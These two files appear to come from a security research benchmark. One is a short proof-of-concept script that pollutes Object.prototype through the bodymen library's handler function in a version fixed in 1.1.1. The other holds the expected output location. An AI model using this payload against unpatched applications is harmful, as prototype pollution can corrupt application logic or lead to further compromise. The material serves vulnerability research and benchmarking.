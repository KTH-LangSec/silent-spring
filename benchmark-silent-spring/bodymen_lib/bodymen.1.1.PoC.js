//https://github.com/diegohaz/bodymen/commit/5d52e8cf360410ee697afd90937e6042c3a8653b
// PP has been fixed in 1.1.1
const x = require("bodymen");
x.handler('__proto__', 'polluted', 'yes')
