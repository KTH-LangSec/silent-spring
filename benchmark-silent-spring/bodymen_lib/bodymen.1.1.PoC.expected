node_modules/bodymen/dist/index.js:44:26